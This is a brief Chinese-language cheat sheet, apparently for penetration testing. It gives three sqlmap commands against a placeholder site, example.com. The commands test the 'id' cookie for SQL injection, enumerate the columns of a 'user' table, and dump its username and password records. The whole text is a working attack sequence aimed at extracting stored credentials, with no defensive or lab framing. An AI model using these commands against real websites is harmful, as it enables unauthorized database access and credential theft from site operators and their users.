目标网站:http://www.example.com/news.php?id=110
查看是否存在cookie注入漏洞
sqlmap -u "http://www.example.com/news.php" --cookie "id=110" --level 2查询user表中所有的字段
sqlmap -u "http://www.example.com/news.php" --columns -T "user" --cookie "id=110" --level 2查询数据库user表中username和password字段的所有记录并下载
sqlmap -u "http://www.example.com/news.php" --dump -C "username,password" -T "user" --cookie "id=110" --level 2